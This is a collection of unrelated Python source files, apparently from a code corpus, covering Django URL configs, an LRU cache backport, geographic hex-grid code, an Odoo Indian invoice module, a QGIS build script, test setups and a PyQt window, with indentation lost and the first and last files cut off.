cmds[0] = cmds[0][0] + app + cmds[0][1:]
for cmd in cmds:
regx = re.compile('^' + concat + '(' + cmd + ') *', re.IGNORECASE)
if regx.search(text.strip()) and len(text.split(" ")[1 + i]) == len(cmd):
found = True
concat += text.split(" ")[1 + i] + " "
else:
found = False
break
i += 1
return found
def splitButNotQuotes(text):
text = text.strip()
split = []
pos = 0
str = ""
quote = False
lent = len(text)
while pos < len(text):
if text[pos] == '"':
quote = not quote
if (text[pos] == ' ' and quote == False) or pos == len(text) - 1:
split.append(str)
str = ""
else:
str = str + text[pos]
pos += 1
return split
def allFilters():
dir = 'filters/'
return [f.replace('.py', '') for f in os.listdir(dir) if os.path.isfile(os.path.join(dir, f))]
|
from collections import namedtuple
from functools import update_wrapper
from threading import RLock
_CacheInfo = namedtuple("CacheInfo", ["hits", "misses", "maxsize", "currsize"])
class _HashedSeq(list):
__slots__ = 'hashvalue'
def __init__(self, tup, hash=hash):
self[:] = tup
self.hashvalue = hash(tup)
def __hash__(self):
return self.hashvalue
def _make_key(args, kwds, typed,
kwd_mark=(object(),),
fasttypes={int, str, frozenset, type(None)},
sorted=sorted, tuple=tuple, type=type, len=len):
"""Make a cache key from optionally typed positional and keyword arguments."""
key = args
if kwds:
sorted_items = sorted(kwds.items())
key += kwd_mark
for item in sorted_items:
key += item
if typed:
key += tuple(type(v) for v in args)
if kwds:
key += tuple(type(v) for k, v in sorted_items)
elif len(key) == 1 and type(key[0]) in fasttypes:
return key[0]
return _HashedSeq(key)
def lru_cache(maxsize=100, typed=False):
def decorating_function(user_function):
cache = dict()
stats = [0, 0] # make statistics updateable non-locally
HITS, MISSES = 0, 1 # names for the stats fields
make_key = _make_key
cache_get = cache.get # bound method to lookup key or return None
_len = len # localize the global len() function
lock = RLock() # because linkedlist updates aren't threadsafe
root = [] # root of the circular doubly linked list
root[:] = [root, root, None, None] # initialize by pointing to self
nonlocal_root = [root] # make updateable non-locally
PREV, NEXT, KEY, RESULT = 0, 1, 2, 3 # names for the link fields
if maxsize == 0:
def wrapper(*args, **kwds):
# no caching, just do a statistics update after a successful call
result = user_function(*args, **kwds)
stats[MISSES] += 1
return result
elif maxsize is None:
def wrapper(*args, **kwds):
# simple caching without ordering or size limit
key = make_key(args, kwds, typed)
result = cache_get(key, root) # root used here as a unique not-found sentinel
if result is not root:
stats[HITS] += 1
return result
result = user_function(*args, **kwds)
cache[key] = result
stats[MISSES] += 1
return result
else:
def wrapper(*args, **kwds):
# size limited caching that tracks accesses by recency
key = make_key(args, kwds, typed) if kwds or typed else args
with lock:
link = cache_get(key)
if link is not None:
# record recent use of the key by moving it to the front of the list
root, = nonlocal_root
link_prev, link_next, key, result = link
link_prev[NEXT] = link_next
link_next[PREV] = link_prev
last = root[PREV]
last[NEXT] = root[PREV] = link
link[PREV] = last
link[NEXT] = root
stats[HITS] += 1
return result
result = user_function(*args, **kwds)
with lock:
root, = nonlocal_root
if key in cache:
# getting here means that this same key was added to the
# cache while the lock was released. since the link
# update is already done, we need only return the
# computed result and update the count of misses.
pass
elif _len(cache) >= maxsize:
# use the old root to store the new key and result
oldroot = root
oldroot[KEY] = key
oldroot[RESULT] = result
# empty the oldest link and make it the new root
root = nonlocal_root[0] = oldroot[NEXT]
oldkey = root[KEY]
oldvalue = root[RESULT]
root[KEY] = root[RESULT] = None
# now update the cache dictionary for the new links
del cache[oldkey]
cache[key] = oldroot
else:
# put result in a new link at the front of the list
last = root[PREV]
link = [last, root, key, result]
last[NEXT] = root[PREV] = cache[key] = link
stats[MISSES] += 1
return result
def cache_info():
"""Report cache statistics."""
with lock:
return _CacheInfo(stats[HITS], stats[MISSES], maxsize, len(cache))
def cache_clear():
"""Clear the cache and cache statistics."""
with lock:
cache.clear()
root = nonlocal_root[0]
root[:] = [root, root, None, None]
stats[:] = [0, 0]
wrapper.__wrapped__ = user_function
wrapper.cache_info = cache_info
wrapper.cache_clear = cache_clear
return update_wrapper(wrapper, user_function)
return decorating_function
|
from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^$', views.index, name='index'),
]
|
from math import pi,radians, cos, sin, asin, sqrt, ceil, floor
from s2sphere import CellId, LatLng, Cell, MAX_AREA, Point
from operator import itemgetter
earth_Rmean = 6371000.0
earth_Rrect = 6367000.0
earth_Rmax = 6378137.0
earth_Rmin = 6356752.3
def earth_Rreal(latrad):
return (1.0 / (((cos(latrad)) / earth_Rmax) ** 2 + ((sin(latrad)) / earth_Rmin) ** 2)) ** 0.5
max_size = 1 << 30
lvl_big = 10
lvl_small = 17
HEX_R = 70.0
safety = 0.999
safety_border = 0.9
def get_distance(location1, location2):
lat1, lng1 = location1
lat2, lng2 = location2
lat1, lng1, lat2, lng2 = map(radians, (lat1, lng1, lat2, lng2))
d = sin(0.5*(lat2 - lat1)) ** 2 + cos(lat1) * cos(lat2) * sin(0.5*(lng2 - lng1)) ** 2
return 2 * earth_Rrect * asin(sqrt(d))
def get_border_pseudohex(coords, HEX_NUM):
border = []
for a in range(0, 6):
tcoord = coords[-HEX_NUM * (6 - a)]
tcoord = neighbor_circle(tcoord, a, False, 0.5)
border.append(tcoord)
border.append(border[0])
return border
def get_border_cell(s2_id):
locs = []
s2_cell = Cell(s2_id)
for i in [0, 1]:
for j in [0, 1]:
locs.append([s2_cell.get_latitude(i, j) * 180 / pi, s2_cell.get_longitude(i, j) * 180 / pi])
output = [locs[0], locs[1], locs[3], locs[2], locs[0]]
return output
def neighbor_pseudohex(location, HEX_NUM, pos):
pos = pos % 6
torange = HEX_NUM * (3 ** 0.5) + 1
while torange > 1:
location = neighbor_circle(location, pos, shift=True)
torange -= 1
location = neighbor_circle(location, pos, shift=True, factor=torange)
location = neighbor_circle(location, pos + 2, shift=True, factor=0.5)
return location
def get_pseudo_hex(location, layer_max, layer_min=0):
coords = []
if layer_max < 0 or layer_min > layer_max:
return coords
coords.append(location[:])
if layer_max < 1:
return coords
for b in range(0, 6):
coords.append(neighbor_pseudohex(coords[0], 30, b))
offs = 1
for n in range(1, layer_max):
offs = offs + 6 * (n - 1)
for b in range(0, 6 * n):
coords.append(neighbor_pseudohex(coords[b + offs], 30, b / n))
if b % n == n - 1:
coords.append(neighbor_pseudohex(coords[b + offs], 30, b / n + 1))
if layer_min < 1:
return coords
ind_f = 1
for l in range(1, layer_min):
ind_f += 6 * l
return coords[ind_f:]
def neighbor_circle(location, pos, shift=False, factor=1.0):
pos = pos % 6
latrad = location[0] * pi / 180
x_un = factor * safety / earth_Rrect / cos(latrad) * 180 / pi
y_un = factor * safety / earth_Rrect * 180 / pi
if not shift:
y_un = y_un * (3.0 ** 0.5) / 2.0 * HEX_R
x_un = x_un * HEX_R * 1.5
yvals = [-2, -1, 1, 2, 1, -1]
xvals = [0, 1, 1, 0, -1, -1]
else:
y_un = y_un * HEX_R * 1.5
x_un = x_un * (3.0 ** 0.5) / 2.0 * HEX_R
yvals = [-1, 0, 1, 1, 0, -1]
xvals = [1, 2, 1, -1, -2, -1]
newlat = location[0] + y_un * yvals[pos]
newlng = ((location[1] + x_un * xvals[pos] + 180) % 360) - 180
return (newlat, newlng)
def get_area_spiral(location, layer_max, layer_min=0):
coords = []
if layer_max < 0:
return coords
coords.append(location[:])
if layer_max < 1:
return coords
for b in range(0, 6):
coords.append(neighbor_circle(coords[0], b))
offs = 1
for n in range(1, layer_max):
offs = offs + 6 * (n - 1)
for b in range(0, 6 * n):
coords.append(neighbor_circle(coords[b + offs], b / n))
if b % n == n - 1:
coords.append(neighbor_circle(coords[b + offs], b / n + 1))
if layer_min < 1:
return coords
elif layer_min > layer_max:
return []
ind_f = 1
for l in range(1, layer_min):
ind_f += 6 * l
return coords[ind_f:]
def ij_offs(cell_in, offs_i, offs_j): # input type is CellId
face, i, j = cell_in.to_face_ij_orientation()[0:3]
size = cell_in.get_size_ij(cell_in.level())
i_new = i + size * offs_i
j_new = j + size * offs_j
out = cell_in.from_face_ij_same(face, i_new, j_new, j_new >= 0 and i_new >= 0 and i_new < max_size and j_new < max_size).parent(cell_in.level())
return out # output type is CellId
def neighbor_s2_circle(location, i_dir=0.0, j_dir=0.0): # input location can be list, tuple or Point
if type(location) in (list, tuple):
ll_location = LatLng.from_degrees(location[0], location[1])
elif type(location) is Point:
ll_location = LatLng.from_point(location)
elif type(location) is LatLng:
ll_location = location
else:
return None
cid_large = CellId.from_lat_lng(ll_location).parent(lvl_big)
cid_small = cid_large.child_begin(lvl_small)
vec_to_j = (Cell(ij_offs(cid_small, 0, 1)).get_center() - Cell(cid_small).get_center()).normalize()
vec_to_i = (Cell(ij_offs(cid_small, 1, 0)).get_center() - Cell(cid_small).get_center()).normalize()
vec_newlocation = ll_location.to_point() + safety * HEX_R / earth_Rrect * (i_dir * 3 ** 0.5 * vec_to_i + j_dir * 1.5 * vec_to_j)
return vec_newlocation # output is Point
def get_area_cell(location,unfilled=False):
border = []
locs = []
cid_large = CellId.from_lat_lng(LatLng.from_degrees(location[0], location[1])).parent(lvl_big)
border.append(get_border_cell(cid_large))
if unfilled:
return [], border, cid_large
corner = neighbor_s2_circle(LatLng.from_degrees(border[-1][0][0], border[-1][0][1]), safety_border*0.5, safety_border/3.0)
j_maxpoint = LatLng.from_point(neighbor_s2_circle(LatLng.from_degrees(border[-1][1][0], border[-1][1][1]), safety_border*0.5, (1-safety_border)/3.0))
i_maxpoint = LatLng.from_point(neighbor_s2_circle(LatLng.from_degrees(border[-1][3][0], border[-1][3][1]), (1-safety_border)*0.5, safety_border/3.0))
base = corner
p_start = base
dist_j = j_maxpoint.get_distance(LatLng.from_point(p_start))
last_dist_j = None
j = 0
while last_dist_j is None or dist_j < last_dist_j:
dist_i = i_maxpoint.get_distance(LatLng.from_point(p_start))
last_dist_i = None
while last_dist_i is None or dist_i < last_dist_i:
locs.append(LatLng.from_point(p_start))
p_start = neighbor_s2_circle(p_start, 1.0, 0.0)
last_dist_i = dist_i
dist_i = i_maxpoint.get_distance(LatLng.from_point(p_start))
base = neighbor_s2_circle(base, 0.0, 1.0)
last_dist_j = dist_j
dist_j = j_maxpoint.get_distance(LatLng.from_point(base))
if j % 2 == 1:
p_start = base
else:
p_start = neighbor_s2_circle(base, -0.5, 0.0)
j += 1
all_loc = []
for loc in locs:
all_loc.append([loc.lat().degrees, loc.lng().degrees])
return all_loc, border,cid_large
def workers_for_level(lvl,parts):
area = MAX_AREA.get_value(lvl) * earth_Rmean**2
area_scan = 1.5*3**0.5 * HEX_R**2
num_scans = area / area_scan
num_scans_ph_max = num_scans * 5 * 2 #10 minute time (* 6) and all cells empty (* 2)
num_worker_scans_ph = 3600.0 / 10 - 2 #reauthorizations (- 2)
num_workers_required = int(ceil(num_scans_ph_max / parts /num_worker_scans_ph))
return num_workers_required
def workers_for_number(num_scans,parts=1):
num_scans_ph_max = num_scans * 5 * 2 #10 minute time (* 6) and all cells empty (* 2)
num_worker_scans_ph = 3600.0 / 10 - 2 #reauthorizations (- 2)
num_workers_required = int(ceil(num_scans_ph_max/ num_worker_scans_ph /parts))
return num_workers_required
class Hexgrid(object):
earth_R = earth_Rrect
param_shift = 217.91
param_stretch = 591
r_sight = 70.0
safety = 0.999
def __init__(self):
self.grid = self.init_grid()
def init_lats(self):
latrad = 0.0
lats = []
c = 0.5 * self.r_sight * self.safety
while latrad < pi / 2:
lats.append(latrad)
latrad += c / self.earth_R
return lats
def init_grid(self):
grid_all = []
lats = self.init_lats()
c = 2 * pi / (3 ** 0.5 * self.r_sight * self.safety) * self.earth_R
even_lng = True
strip_amount = int(ceil(c))
grid_all.append((0, strip_amount, even_lng))
ind_lat = 2
while ind_lat < len(lats):
amount = int(ceil(c * cos(lats[ind_lat])))
if amount < strip_amount - (sin(lats[ind_lat]*2)*self.param_shift+self.param_stretch):
ind_lat -= 1
strip_amount = int(ceil(c * cos(lats[ind_lat])))
else:
even_lng = not even_lng
if ind_lat + 1 < len(lats):
lat = lats[ind_lat + 1] * 180 / pi
grid_all.append((lat, strip_amount, even_lng))
ind_lat += 3
grid_all.append((90.0, 1, True)) # pole
return grid_all
def dist_cmp(self, location1, location2):
return sin(0.5 * (location2[0] - location1[0])) ** 2 + cos(location2[0]) * cos(location1[0]) * sin(0.5 * (location2[1] - location1[1])) ** 2
def cover_circle(self,loc,radius):
lat,lng = loc
output = []
r_lat = radius / earth_Rrect*180/pi
r_lng = r_lat /cos(min(abs(lat)+r_lat,90.0)*pi/180)
locations = self.cover_region((lat-r_lat,lng-r_lng),(lat+r_lat,lng+r_lng))
for location in locations:
dist = get_distance(loc,location)
if dist < radius:
output.append(location)
return output
def cover_cell(self, cid):
lats = []
lngs = []
output = []
s2_cell = Cell(cid)
lvl = s2_cell.level()
for i in [0, 1]:
for j in [0, 1]:
lats.append(s2_cell.get_latitude(i, j)/pi*180)
lngs.append(s2_cell.get_longitude(i, j)/pi*180)
locations = self.cover_region((min(lats),min(lngs)),(max(lats),max(lngs)))
for location in locations:
testid = CellId.from_lat_lng(LatLng.from_degrees(location[0],location[1])).parent(lvl)
if testid == cid:
output.append(location)
return output
def cover_region(self, location1, location2):
l_lat1 = location1[0]
l_lat2 = location2[0]
l_lng1 = location1[1]
l_lng2 = location2[1]
if l_lat1 > l_lat2:
l_lat1, l_lat2 = l_lat2, l_lat1
range_lat = []
if l_lat1 >= 0 and l_lat2 >= 0:
range_lat.append([[l_lat1, l_lat2], False])
elif l_lat1 <= 0 and l_lat2 <= 0:
range_lat.append([[-l_lat2, -l_lat1], True])
else:
range_lat.append([[0.0, -l_lat1], True])
range_lat.append([[0.0, l_lat2], False])
if l_lng1 > l_lng2:
l_lng1, l_lng2 = l_lng2, l_lng1
l_lng1 = l_lng1 % 360
l_lng2 = l_lng2 % 360
range_lng = []
if l_lng1 > l_lng2:
range_lng.append([l_lng1, 360.0])
range_lng.append([0.0, l_lng2])
else:
range_lng.append([l_lng1, l_lng2])
points = []
for r_lat in range_lat:
for r_lng in range_lng:
newpoints = self.cover_region_simple((r_lat[0][0], r_lng[0]), (r_lat[0][1], r_lng[1]))
for point in newpoints:
if point[1] == 360.0:
continue
if r_lat[1]:
if point[0] == 0.0:
continue
else:
point[0] = -point[0]
point[1] = (point[1] + 180) % 360 - 180
points.append(point)
points.sort(key=itemgetter(0,1))
return points
def cover_region_simple(self, location1, location2): # lat values must be between -90 and +90, lng values must be between -180 and 180
l_lat1 = location1[0]
l_lat2 = location2[0]
l_lng1 = location1[1]
l_lng2 = location2[1]
ind_lat_f = 0
while l_lat1 > self.grid[ind_lat_f][0]:
ind_lat_f += 1
ind_lat_t = ind_lat_f + 1
while ind_lat_t < len(self.grid) and l_lat2 >= self.grid[ind_lat_t][0]:
ind_lat_t += 1
points = []
for ind_lat in range(ind_lat_f, ind_lat_t):
d_lng = 360.0 / self.grid[ind_lat][1]
if self.grid[ind_lat][2]:
c_lng = 0.0
else:
c_lng = 0.5
ind_lng_f = int(ceil(l_lng1 / d_lng - c_lng))
ind_lng_t = int(floor(l_lng2 / d_lng - c_lng))
for ind_lng in range(ind_lng_f, ind_lng_t + 1):
points.append([self.grid[ind_lat][0], d_lng * (ind_lng + c_lng)])
return points
def to_grid_point(self, location):
l_lat = location[0]
l_lng = location[1]
if l_lat < 0:
l_lat = -l_lat
neg_lat = True
else:
neg_lat = False
l_lng = l_lng % 360
poss = []
ind_lat = 0
while l_lat > self.grid[ind_lat][0]:
ind_lat += 1
if l_lat == self.grid[ind_lat][0]:
ind_f = ind_lat
else:
ind_f = ind_lat - 1
if ind_lat + 1 == len(self.grid):
ind_t = ind_lat
poss.append([90.0, 0.0])
else:
ind_t = ind_lat + 1
for ind_tlat in range(ind_f, ind_t):
d_lng = 360.0 / self.grid[ind_tlat][1]
lng = floor(l_lng / d_lng) * d_lng
if not self.grid[ind_tlat][2]:
lng += 0.5 * d_lng
poss.append([self.grid[ind_tlat][0], lng])
poss.append([self.grid[ind_tlat][0], lng + d_lng])
dist_min = 3.0
ind_min = 0
for p in range(0, len(poss)):
dist = self.dist_cmp(location, poss[p])
if dist < dist_min:
dist_min = dist
ind_min = p
if neg_lat:
poss[ind_min][0] = -poss[ind_min][0]
poss[ind_min][1] = (poss[ind_min][1] + 180) % 360 - 180
return poss[ind_min]
|
from odoo import api, fields, models, _
from odoo.exceptions import ValidationError
class AccountInvoice(models.Model):
_inherit = "account.invoice"
@api.depends('amount_total')
def _compute_amount_total_words(self):
for invoice in self:
invoice.amount_total_words = invoice.currency_id.amount_to_text(invoice.amount_total)
amount_total_words = fields.Char("Total (In Words)", compute="_compute_amount_total_words")
# Use for invisible fields in form views.
l10n_in_import_export = fields.Boolean(related='journal_id.l10n_in_import_export', readonly=True)
# For Export invoice this data is need in GSTR report
l10n_in_export_type = fields.Selection([
('regular', 'Regular'), ('deemed', 'Deemed'),
('sale_from_bonded_wh', 'Sale from Bonded WH'),
('export_with_igst', 'Export with IGST'),
('sez_with_igst', 'SEZ with IGST payment'),
('sez_without_igst', 'SEZ without IGST payment')],
string='Export Type', default='regular', required=True)
l10n_in_shipping_bill_number = fields.Char('Shipping bill number', readonly=True, states={'draft': [('readonly', False)]})
l10n_in_shipping_bill_date = fields.Date('Shipping bill date', readonly=True, states={'draft': [('readonly', False)]})
l10n_in_shipping_port_code_id = fields.Many2one('l10n_in.port.code', 'Shipping port code', states={'draft': [('readonly', False)]})
l10n_in_reseller_partner_id = fields.Many2one('res.partner', 'Reseller', domain=[('vat', '!=', False)], help="Only Registered Reseller", readonly=True, states={'draft': [('readonly', False)]})
l10n_in_partner_vat = fields.Char(related="partner_id.vat", readonly=True)
def _get_report_base_filename(self):
self.ensure_one()
if self.company_id.country_id.code != 'IN':
return super(AccountInvoice, self)._get_report_base_filename()
return self.type == 'out_invoice' and self.state == 'draft' and _('Draft %s') % (self.journal_id.name) or \
self.type == 'out_invoice' and self.state in ('open','in_payment','paid') and '%s - %s' % (self.journal_id.name, self.number) or \
self.type == 'out_refund' and self.state == 'draft' and _('Credit Note') or \
self.type == 'out_refund' and _('Credit Note - %s') % (self.number) or \
self.type == 'in_invoice' and self.state == 'draft' and _('Vendor Bill') or \
self.type == 'in_invoice' and self.state in ('open','in_payment','paid') and _('Vendor Bill - %s') % (self.number) or \
self.type == 'in_refund' and self.state == 'draft' and _('Vendor Credit Note') or \
self.type == 'in_refund' and _('Vendor Credit Note - %s') % (self.number)
@api.multi
def _invoice_line_tax_values(self):
self.ensure_one()
tax_datas = {}
TAX = self.env['account.tax']
for line in self.mapped('invoice_line_ids'):
price_unit = line.price_unit * (1 - (line.discount or 0.0) / 100.0)
tax_lines = line.invoice_line_tax_ids.compute_all(price_unit, line.invoice_id.currency_id, line.quantity, line.product_id, line.invoice_id.partner_id)['taxes']
for tax_line in tax_lines:
tax_line['tag_ids'] = TAX.browse(tax_line['id']).tag_ids.ids
tax_datas[line.id] = tax_lines
return tax_datas
def inv_line_characteristic_hashcode(self, invoice_line):
res = super(AccountInvoice, self).inv_line_characteristic_hashcode(invoice_line)
return res + "-%s" %(invoice_line.get('product_uom_id', 'False'))
@api.model
def tax_line_move_line_get(self):
res = super(AccountInvoice, self).tax_line_move_line_get()
for vals in res:
invoice_tax_line = self.env['account.invoice.tax'].browse(vals.get('invoice_tax_line_id'))
vals['product_id'] = invoice_tax_line.l10n_in_product_id.id
vals['uom_id'] = invoice_tax_line.l10n_in_uom_id.id
vals['quantity'] = invoice_tax_line.l10n_in_quantity
return res
def _prepare_tax_line_vals(self, line, tax):
vals = super(AccountInvoice, self)._prepare_tax_line_vals(line, tax)
vals['l10n_in_product_id'] = line.product_id.id
vals['l10n_in_uom_id'] = line.uom_id.id
vals['l10n_in_quantity'] = line.quantity
return vals
@api.multi
def get_taxes_values(self, tax_group_fields=False):
if tax_group_fields:
tax_group_fields |= set(['l10n_in_quantity'])
else:
tax_group_fields = set(['l10n_in_quantity'])
return super(AccountInvoice, self).get_taxes_values(tax_group_fields)
class AccountInvoiceTax(models.Model):
_inherit = "account.invoice.tax"
l10n_in_product_id = fields.Many2one('product.product', string='Product')
l10n_in_uom_id = fields.Many2one('uom.uom', string='Unit of Measure')
l10n_in_quantity = fields.Float(string='Quantity')
@api.multi
def _prepare_invoice_tax_val(self):
res = super(AccountInvoiceTax, self)._prepare_invoice_tax_val()
res['l10n_in_product_id'] = self.l10n_in_product_id.id
res['l10n_in_uom_id'] = self.l10n_in_uom_id.id
return res
|
from qgis_mobility.generator.builder import Builder
import distutils.dir_util
import os
import glob
import shutil
from qgis_mobility.generator.python_builder import PythonBuilder
from qgis_mobility.generator.qgis_builder import QGisBuilder
from qgis_mobility.generator.pyqt_builder import PyQtBuilder
class RuntimeBuilder(Builder):
""" Represents the build strategy for the Runtime library """
def library_name(self):
""" Returns the library name of the runtime """
return 'runtime'
def human_name(self):
""" Returns the human readable name of the Runtime """
return 'Runtime Build Process'
def pyqt4_override_flags(self):
return "-x QSETINT_CONVERSION -x QSETTYPE_CONVERSION -x VendorID -t WS_UNKOWN -x PyQt_NoPrintRangeBug -t Qt_4_8_0 -x Py_v3 -g"
def sip_dir(self):
return os.path.join(self.cache_path,
'build', 'Python-2.7.2', 'share', 'sip')
def host_python_binary_path(self):
return os.path.join(self.cache_path, 'hostpython', 'bin')
def get_default_toolchain_mappings(self):
flags = Builder.get_default_toolchain_mappings(self)
flags['LD_RUN_PATH'] = os.path.join(self.get_recon().get_qt_path(), 'lib')
return flags
def get_default_flags(self):
cflags = '-Wno-psabi -fsigned-char -mthumb'
ldflags = '-Wl,--fix-cortex-a8'
return { 'CFLAGS' : cflags,
'LDFLAGS' : ldflags,
'CXXFLAGS' : cflags }
def get_default_configure_flags(self):
flags = Builder.get_default_configure_flags(self)
flags.extend(['--with-qgis-base-path=' + QGisBuilder(self.get_recon()).get_build_path(),
'--with-python-base-path=' + PythonBuilder(self.get_recon()).get_build_path(),
'--with-qt-base-path=' + self.get_recon().get_qt_path(),
'--with-qt-library-path=' + os.path.join(self.get_source_path(), 'lib'),
'--with-qt-include-path=' + os.path.join(self.get_recon().get_qt_path(), 'include'),
'--with-sip=' + self.sip_dir(),
'--with-pyqt4-flags=' + self.pyqt4_override_flags(),
'--with-pyqt4-dir=' + self.sip_dir(),
'--with-sip-binary-path=' + self.host_python_binary_path(),
'--with-preconfig-path=/data/data/org.kde.necessitas.example.QGisMobility/files',
'--with-project-code-path=/data/data/org.kde.necessitas.example.QGisMobility/files/application',
'--with-xtra-sip-dirs=' + os.path.join(QGisBuilder(self.get_recon()).get_source_path(),
'qgis-1.8.0/python'),
'--disable-silent-rules'])
return flags
def salt_flags(self, flags):
flags = Builder.salt_flags(self, flags)
pkg_config_path = os.path.join(self.get_build_path(), 'lib', 'pkg_config')
if 'PKG_CONFIG_PATH' in flags:
flags['PKG_CONFIG_PATH'] = pkg_config_path
else:
flags['PKG_CONFIG_PATH'] += os.path.sep + pkg_config_path
return flags
def do_build(self):
""" Runs the actual build process """
distutils.dir_util.copy_tree(self.get_runtime_path(), self.get_source_path())
os.mkdir(os.path.join(self.get_source_path(), 'lib'))
for libname in glob.glob(os.path.join(self.get_recon().get_qt_path(), 'lib', '*.so')):
outlibname = os.path.join(self.get_source_path(), 'lib', os.path.split(libname)[-1])
print "Copying for libtool's sake %s to %s" % (libname, outlibname)
shutil.copyfile(libname, outlibname)
self.run_autoreconf()
self.sed_ir('s/(hardcode_into_libs)=.*$/\\1=no/', 'configure')
self.fix_config_sub_and_guess()
# Need to remove Q_PID declaration in the source files temporarily
qprocess_sip_path = os.path.join(
PyQtBuilder(self.get_recon()).get_build_path(),
'share', 'sip', 'QtCore', 'qprocess.sip')
try:
self.sed_ir('s|typedef qint64 Q_PID;|//typedef qint64 Q_PID;|',
qprocess_sip_path)
self.run_autotools_and_make()
finally:
self.sed_ir('s|//typedef qint64 Q_PID;|typedef qint64 Q_PID;|',
qprocess_sip_path)
source_include_path = os.path.join(self.get_build_path(), 'include')
if os.path.exists(source_include_path):
distutils.dir_util.copy_tree(
source_include_path, self.get_include_path())
self.mark_finished()
|
from common import mathutil
import decimal
def main():
decimal.getcontext().prec = 110
total = 0
for i in range(1, 100):
if not mathutil.isPower(i, 2):
total += sumOfDigits(i)
print(total)
def sumOfDigits(n):
dec = str(decimal.Decimal(n).sqrt())
i = dec.index('.')
dec = dec[i + 1: i + 100] #-1]
return sum(int(i) for i in dec) + int(n ** .5)
if __name__ == "__main__":
main()
|
from __future__ import absolute_import
import os
tests_dir = os.path.dirname(os.path.realpath(__file__)) or '.'
os.chdir(tests_dir)
_okconfig_overridden_vars = {}
_environment = None
import okconfig
import okconfig.config as config
from shutil import copytree
import unittest2 as unittest
from pynag.Utils.misc import FakeNagiosEnvironment
class OKConfigTest(unittest.TestCase):
def setUp(self, test=None):
"""
Sets up the nagios fake environment and overrides okconfig configuration
variables to make changes within it.
"""
global _environment
_environment = FakeNagiosEnvironment()
_environment.create_minimal_environment()
copytree(os.path.realpath("../usr/share/okconfig/templates"),
_environment.tempdir + "/conf.d/okconfig-templates")
_environment.update_model()
for var in ['nagios_config', 'destination_directory',
'examples_directory', 'examples_directory_local',
'template_directory']:
_okconfig_overridden_vars[var] = getattr(okconfig, var)
okconfig.nagios_config = _environment.get_config().cfg_file
config.nagios_config = okconfig.nagios_config
config.git_commit_changes = 0
okconfig.destination_directory = _environment.objects_dir
okconfig.examples_directory = "../usr/share/okconfig/examples"
okconfig.template_directory = "../usr/share/okconfig/templates"
okconfig.examples_directory_local = _environment.tempdir + "/okconfig"
os.mkdir(okconfig.examples_directory_local)
okconfig.addhost("linux.okconfig.org",
address="192.168.1.1",
templates=["linux"])
okconfig.addhost("windows.okconfig.org",
address="192.168.1.2",
templates=["windows"])
okconfig.addhost("webserver.okconfig.org",
address="192.168.1.2",
templates=["http"])
def tearDown(self, test=None):
"""
Tear down the fake nagios environment and restore okconfig variables
"""
_environment.terminate()
for var, value in list(_okconfig_overridden_vars.items()):
setattr(okconfig, var, value)
def runTest(*args, **kwargs):
pass
|
from __future__ import print_function, division, unicode_literals
import os
import ycm_core
from clang_helpers import PrepareClangFlags
compilation_database_folder = ''
flags = [
'-std=c++11',
'-x',
'c++',
'-DQT_CORE_LIB',
'-DQT_GUI_LIB',
'-DQT_NETWORK_LIB',
'-DQT_QML_LIB',
'-DQT_QUICK_LIB',
'-DQT_SQL_LIB',
'-DQT_WIDGETS_LIB',
'-DQT_XML_LIB',
'-I', '/usr/lib/qt/mkspecs/linux-clang',
'-I', '/usr/include/qt4',
'-I', '/usr/include/qt4/QtCore',
'-I', '/usr/include/qt4/QtGui',
'-I', '/usr/include/qt4/QtNetwork',
'-I', '/usr/include/qt4/QtWidgets',
'-I', '/usr/include/qjson',
'-I', '/usr/include/X11',
'-I', '/usr/include/X11/extensions',
'-I', '.',
'-I', 'Tests',
'-I', 'build',
'-I', 'build/Tests'
]
if compilation_database_folder:
database = ycm_core.CompilationDatabase( compilation_database_folder )
else:
database = None
def DirectoryOfThisScript():
return os.path.dirname( os.path.abspath( __file__ ) )
def MakeRelativePathsInFlagsAbsolute( flags, working_directory ):
if not working_directory:
return flags
new_flags = []
make_next_absolute = False
path_flags = [ '-isystem', '-I', '-iquote', '--sysroot=' ]
for flag in flags:
new_flag = flag
if make_next_absolute:
make_next_absolute = False
if not flag.startswith( '/' ):
new_flag = os.path.join( working_directory, flag )
for path_flag in path_flags:
if flag == path_flag:
make_next_absolute = True
break
if flag.startswith( path_flag ):
path = flag[ len( path_flag ): ]
new_flag = path_flag + os.path.join( working_directory, path )
break
if new_flag:
new_flags.append( new_flag )
return new_flags
def FlagsForFile( filename ):
if database:
# Bear in mind that compilation_info.compiler_flags_ does NOT return a
# python list, but a "list-like" StringVec object
compilation_info = database.GetCompilationInfoForFile( filename )
final_flags = PrepareClangFlags(
MakeRelativePathsInFlagsAbsolute(
compilation_info.compiler_flags_,
compilation_info.compiler_working_dir_ ),
filename )
else:
relative_to = DirectoryOfThisScript()
final_flags = MakeRelativePathsInFlagsAbsolute( flags, relative_to )
return {
'flags': final_flags,
'do_cache': True
}
|
from django.conf.urls import patterns, url
from .views import ChatRoom, CreateMessage, CreateRoom
from django.contrib.auth.decorators import login_required
urlpatterns = patterns('',
url(r'^$', login_required(CreateRoom.as_view()), name='lobby'),
url(r'^(?P<room>.+)/msg/$', login_required(CreateMessage.as_view()), name='create_message'),
url(r'^(?P<room>.+)/$', login_required(ChatRoom.as_view()), name='chatroom'),
)
|
import os
def show_info():
temp_sensor_list = ""
out = os.popen("ls /sys/bus/w1/devices").read()
w1_bus_folders = out.splitlines()
for folder in w1_bus_folders:
if folder[0:3] == "28-":
temp_sensor_list += folder + "\n"
return temp_sensor_list.strip()
if __name__ == '__main__':
print(show_info())
|
from django.test import TestCase
from django.test.client import Client
class DownloadTest(TestCase):
def setUp(self):
self.client = Client()
def test_access_download_page(self):
"""
Test the access to the download page. Allow for everybody.
"""
result = self.client.get('/download/')
self.assertEqual(result.status_code, 200)
|
import sys, os
import qtawesome as qta
from components import create
from components import introductionWindow
from PyQt5 import QtGui, QtCore, QtWidgets
import colorama as clr
class Window(QtWidgets.QWidget):
def __init__(self):
super(Window, self).__init__()
self.setGeometry(50,50,1200,700)
self.setWindowTitle("Hitch")
self.setWindowFlags(self.windowFlags() | QtCore.Qt.FramelessWindowHint) #Use this for a frameless window. Will be used later!
create.CreateUI.create(self)
#init colorama
clr.init()
#Set the app icon, maximize the window, show it and the startup window.
self.icon()
self.center()
self.showMaximized()
self.show()
self.startup = introductionWindow.Introduction()
self.startup.show()
#Center the window on the monitor where the mouse cursor is
def center(self):
frameGm = self.frameGeometry()
screen = QtWidgets.QApplication.desktop().screenNumber(QtWidgets.QApplication.desktop().cursor().pos())
centerPoint = QtWidgets.QApplication.desktop().screenGeometry(screen).center()
